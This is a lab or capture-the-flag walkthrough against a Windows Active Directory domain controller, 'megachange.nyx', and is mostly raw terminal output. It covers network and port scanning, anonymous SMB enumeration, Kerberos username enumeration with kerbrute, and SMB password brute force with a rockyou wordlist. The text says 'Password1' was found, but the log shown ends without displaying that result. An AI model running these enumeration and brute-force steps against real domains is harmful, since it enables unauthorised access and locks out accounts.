CHANGE MACHINE

CHANGE 

First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below.

┌──(root㉿kali)-[/home/luis]
└─# arp-scan -I eth0 --localnet
Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.88.1	d8:44:89:50:2d:a3	(Unknown)
192.168.88.4	00:e0:4c:97:01:a7	(Unknown)
192.168.88.5	00:d8:61:fa:c0:4a	(Unknown)
192.168.88.7	08:00:27:b1:ae:9f	(Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded

Now, let's go execute nmap command to identify alives ports and version with this host 192.168.88.7 as you can see below.

Key open ports and services include:
53/tcp: Simple DNS Plus (likely acting as a DNS server for the domain)
88/tcp: Microsoft Windows Kerberos (essential for Active Directory authentication)
135/tcp: Microsoft Windows RPC
139/tcp: Microsoft Windows netbios-ssn
389/tcp: Microsoft Windows Active Directory LDAP (for directory services)
445/tcp: Microsoft Windows SMB (for file sharing and other services)
464/tcp: kpasswd5? (Kerberos password change protocol)
593/tcp: Microsoft Windows RPC over HTTP 1.0
636/tcp: tcpwrapped (LDAP over SSL)
3268/tcp: Microsoft Windows Active Directory LDAP (Global Catalog)
3269/tcp: tcpwrapped (Global Catalog LDAP over SSL)
5985/tcp: Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp: .NET Message Framing
47001/tcp, 49664-49711/tcp: Various Microsoft Windows RPC and RPC over HTTP ports
The nmap output also confirms the OS: Windows and CPE: cpe:/o:microsoft:windows.

┌──(root㉿kali)-[/home/luis]
└─# nmap -n -Pn -p- --min-rate 5000 -sV -sC 192.168.88.7 -vvv -sS
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 11:05 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Initiating ARP Ping Scan at 11:05
Scanning 192.168.88.7 [1 port]
Completed ARP Ping Scan at 11:05, 0.12s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:05
Scanning 192.168.88.7 [65535 ports]
Discovered open port 53/tcp on 192.168.88.7
Discovered open port 445/tcp on 192.168.88.7
Discovered open port 139/tcp on 192.168.88.7
Discovered open port 135/tcp on 192.168.88.7
Discovered open port 49681/tcp on 192.168.88.7
Discovered open port 593/tcp on 192.168.88.7
Discovered open port 47001/tcp on 192.168.88.7
Discovered open port 49697/tcp on 192.168.88.7
Discovered open port 49666/tcp on 192.168.88.7
Discovered open port 49664/tcp on 192.168.88.7
Discovered open port 49711/tcp on 192.168.88.7
Discovered open port 49676/tcp on 192.168.88.7
Discovered open port 49688/tcp on 192.168.88.7
Discovered open port 49665/tcp on 192.168.88.7
Discovered open port 389/tcp on 192.168.88.7
Discovered open port 3269/tcp on 192.168.88.7
Discovered open port 636/tcp on 192.168.88.7
Discovered open port 49680/tcp on 192.168.88.7
Discovered open port 5985/tcp on 192.168.88.7
Discovered open port 49667/tcp on 192.168.88.7
Discovered open port 49673/tcp on 192.168.88.7
Discovered open port 49677/tcp on 192.168.88.7
Discovered open port 88/tcp on 192.168.88.7
Discovered open port 3268/tcp on 192.168.88.7
Discovered open port 464/tcp on 192.168.88.7
Discovered open port 9389/tcp on 192.168.88.7
Completed SYN Stealth Scan at 11:05, 15.06s elapsed (65535 total ports)
Initiating Service scan at 11:05
Scanning 26 services on 192.168.88.7
Service scan Timing: About 61.54% done; ETC: 11:07 (0:00:34 remaining)
Completed Service scan at 11:06, 59.62s elapsed (26 services on 1 host)
NSE: Script scanning 192.168.88.7.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 8.61s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.22s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.01s elapsed
Nmap scan report for 192.168.88.7
Host is up, received arp-response (0.00072s latency).
Scanned at 2025-06-28 11:05:25 CEST for 84s
Not shown: 65509 closed tcp ports (reset)
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 128 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 128 Microsoft Windows Kerberos (server time: 2025-06-28 19:05:58Z)
135/tcp   open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 128 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 128
464/tcp   open  kpasswd5?     syn-ack ttl 128
593/tcp   open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 128
3268/tcp  open  ldap          syn-ack ttl 128 Microsoft Windows Active Directory LDAP (Domain: megachange.nyx0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 128
5985/tcp  open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 128 .NET Message Framing
47001/tcp open  http          syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49673/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49676/tcp open  ncacn_http    syn-ack ttl 128 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49680/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49688/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49697/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
49711/tcp open  msrpc         syn-ack ttl 128 Microsoft Windows RPC
MAC Address: 08:00:27:B1:AE:9F (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: CHANGE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-28T19:06:52
|_  start_date: N/A
|_clock-skew: 10h00m10s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 21068/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 21479/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 14035/udp): CLEAN (Timeout)
|   Check 4 (port 26386/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: CHANGE, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b1:ae:9f (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
| Names:
|   CHANGE<20>           Flags: <unique><active>
|   CHANGE<00>           Flags: <unique><active>
|   MEGACHANGE<00>       Flags: <group><active>
|   MEGACHANGE<1c>       Flags: <group><active>
|   MEGACHANGE<1b>       Flags: <unique><active>
| Statistics:
|   08:00:27:b1:ae:9f:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:06
Completed NSE at 11:06, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.66 seconds
           Raw packets sent: 75084 (3.304MB) | Rcvd: 65536 (2.622MB)

Now, we should write in the file hosts the domain which is megachange.nyx as you can see in the piscture below.
┌──(root㉿kali)-[/home/luis]
└─# nano /etc/hosts  

 GNU nano 8.4                                     /etc/hosts                                               
127.0.0.1       localhost
127.0.1.1       kali
192.168.88.7    megachange.nyx
# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

As smb port(445) is alive we have to try listing smb with this command which you can see below, where we have discovered O.S and windows version.

┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "" -p ""
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating missing folder logs/sam
[*] Creating missing folder logs/lsa
[*] Creating missing folder logs/ntds
[*] Creating missing folder logs/dpapi
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Initializing NFS protocol database
[*] Initializing WMI protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing WINRM protocol database
[*] Initializing FTP protocol database
[*] Initializing SMB protocol database
[*] Initializing VNC protocol database
[*] Copying default configuration file
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\:

In addition, we should try use smbmap to see if it is possible obtain some information but as you can see below there is nothing with this command:
smbmap -H 192.168.88.7 -u '' -p ''

┌──(root㉿kali)-[/home/luis]
└─# smbmap -H 192.168.88.7 -u '' -p ''

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[\] Checking for open ports...                                                                              
[*] Detected 1 hosts serving SMB
[|] Authenticating...                                                                                       
[/] Authenticating...                                                                                       
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 192.168.88.7, no fun for you...
[-] Closing connections..                                                                                   
[\] Closing connections..                                                                                   
[|] Closing connections..                                                                                   
[/] Closing connections..                                                                                   
[-] Closing connections..                                                                                   
[*] Closed 1 connections                                                                            Now, we can try use listing smb with this command you can see below which is:

smbclient -NL //192.168.88.7                       

┌──(root㉿kali)-[/home/luis]
└─# smbclient -NL //192.168.88.7
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.88.7 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

In addition, we know there is a open port which we get the critical information such as users, for it

we have to use the kerbrute toolkit in this link and we must execute the wget command to download as you can see  below.

https://github.com/ropnop/kerbrute/releases/tag/v1.0.3
┌──(root㉿kali)-[/home/luis]
└─# wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
--2025-06-28 11:27:11--  https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Resolviendo github.com (github.com)... 140.82.121.4
Conectando con github.com (github.com)[140.82.121.4]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://objects.githubusercontent.com/github-production-release-asset-2e65be/168977645/e8ae4080-1eb1-11ea-8fea-0ea168fa4c79?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T092725Z&X-Amz-Expires=1800&X-Amz-Signature=47d454f6c7972562a681e9bd207bbb2e6d83ad7a72d02168788fecdfbe543b13&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dkerbrute_linux_amd64&response-content-type=application%2Foctet-stream [siguiendo]
--2025-06-28 11:27:12--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/168977645/e8ae4080-1eb1-11ea-8fea-0ea168fa4c79?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T092725Z&X-Amz-Expires=1800&X-Amz-Signature=47d454f6c7972562a681e9bd207bbb2e6d83ad7a72d02168788fecdfbe543b13&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dkerbrute_linux_amd64&response-content-type=application%2Foctet-stream
Resolviendo objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.110.133, 185.199.109.133, 185.199.108.133, ...
Conectando con objects.githubusercontent.com (objects.githubusercontent.com)[185.199.110.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 8286607 (7,9M) [application/octet-stream]
Grabando a: «kerbrute_linux_amd64»

kerbrute_linux_amd64       100%[========================================>]   7,90M  --.-KB/s    en 0,1s    

2025-06-28 11:27:12 (54,3 MB/s) - «kerbrute_linux_amd64» guardado [8286607/8286607]

Now, we have to give perms to execute with the command which you can see below.

┌──(root㉿kali)-[/home/luis]
└─# chmod +x kerbrute_linux_amd64 
                                                                                                            
In addition, we have to see what is the params to use this toolkit with the param -h as you can see below.
┌──(root㉿kali)-[/home/luis]
└─# ./kerbrute_linux_amd64 -h
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/28/25 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

Use "kerbrute [command] --help" for more information about a command.

┌──(root㉿kali)-[/home/luis]
└─# ./kerbrute_linux_amd64 userenum -d megachange.nyx --dc megachange.nyx xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/28/25 - Ronnie Flathers @ropnop

2025/06/28 11:35:14 >  Using KDC(s):
2025/06/28 11:35:14 >  megachange.nyx:88

2025/06/28 11:35:14 >  [+] VALID USERNAME:	 alfredo@megachange.nyx
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 administrator@megachange.nyx
2025/06/28 11:35:15 >  [+] VALID USERNAME:	 change@megachange.nyx
2025/06/28 11:35:19 >  [+] VALID USERNAME:	 Administrator@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 Alfredo@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 sysadmin@megachange.nyx
2025/06/28 11:35:25 >  [+] VALID USERNAME:	 Change@megachange.nyx

Now we have to create a user list to try attack with brute force whose file is users.txt.
┌──(root㉿kali)-[/home/luis]
└─# nano users.txt 

GNU nano 8.4                                      users.txt                                               
2025/06/28 11:35:14 >  [+] VALID USERNAME:       alfredo@megachange.nyx
2025/06/28 11:35:14 >  [+] VALID USERNAME:       administrator@megachange.nyx
2025/06/28 11:35:15 >  [+] VALID USERNAME:       change@megachange.nyx
2025/06/28 11:35:19 >  [+] VALID USERNAME:       Administrator@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:       Alfredo@megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:       sysadmin@megachange.nyx
2025/06/28 11:35:25 >  [+] VALID USERNAME:       Change@megachange.nyx

But we need use this toolkit to remove the @ with the command which you can see below.

┌──(root㉿kali)-[/home/luis]
└─# cat users.txt | tr "@" " " 
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 alfredo megachange.nyx
2025/06/28 11:35:14 >  [+] VALID USERNAME:	 administrator megachange.nyx
2025/06/28 11:35:15 >  [+] VALID USERNAME:	 change megachange.nyx
2025/06/28 11:35:19 >  [+] VALID USERNAME:	 Administrator megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 Alfredo megachange.nyx
2025/06/28 11:35:20 >  [+] VALID USERNAME:	 sysadmin megachange.nyx
2025/06/28 11:35:25 >  [+] VALID USERNAME:	 Change megachange.nyx

But we need use this toolkit to remove @ with the command which $7 use only the username you can see below. 
┌──(root㉿kali)-[/home/luis]
└─# cat users.txt | tr "@" " "| awk '{print$7}'     
alfredo
administrator
change
Administrator
Alfredo
sysadmin
Change

And then we have to redirect to an txt user whose name is usuarios1.txt                                                                                                           

┌──(root㉿kali)-[/home/luis]
└─# cat users.txt | tr "@" " "| awk '{print$7}'> usuarios1.txt
┌──(root㉿kali)-[/home/luis]
└─# cat usuarios1.txt                                         
alfredo
administrator
change
Administrator
Alfredo
sysadmin
Change
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "usuarios1.txt" -p "usuarios1.txt" 
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:Administrator STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:Alfredo STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:Alfredo STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:Alfredo STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:Alfredo STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:sysadmin STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:sysadmin STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:sysadmin STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:Change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:Change STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:Change STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:Change STATUS_LOGON_FAILURE

Now we've discovered password which is Password1 that you can see in the picture below with brute force
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u "usuarios1.txt" -p /usr/share/wordlists/rockyou.txt --ignore-pw-decoding
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:123456 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:123456 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:123456 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:12345 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:12345 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:12345 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:123456789 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:password STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:password STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:password STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:iloveyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:iloveyou STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:iloveyou STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:princess STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:princess STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:princess STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\administrator:1234567 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\change:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Administrator:1234567 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Alfredo:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\sysadmin:1234567 STATUS_LOGON_FAILURE
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\Change:1234567 STATUS_LOGON_FAILURE 
SMB         192.168.88.7    445    CHANGE           [-] megachange.nyx\alfredo:rockyou STATUS_LOGON_FAILURE 
